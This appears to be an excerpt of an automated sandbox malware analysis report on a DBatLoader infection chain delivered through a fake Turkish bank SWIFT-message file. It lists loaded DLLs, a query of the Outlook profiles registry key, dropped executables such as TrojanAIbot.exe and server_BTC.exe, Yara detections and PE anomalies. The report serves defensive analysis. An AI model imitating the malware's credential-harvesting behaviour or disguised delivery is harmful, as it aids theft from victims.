Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: TrojanAIbot.exe.lnk.12.dr

LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Static file information: File size 1224635 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 0000000A.00000003.2177333908.0000000025FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.2163239930.0000000021C78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2163239930.0000000021C4F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.2b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Source: lxsyrsiW.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B2894C

Source: Wisrysxl.PIF.8.dr	Static PE information: real checksum: 0x0 should be: 0x136519
Source: armsvc.exe.10.dr	Static PE information: real checksum: 0x32318 should be: 0x13d574
Source: neworigin.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: x.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x136519
Source: server_BTC.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: TrojanAIbot.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x42478

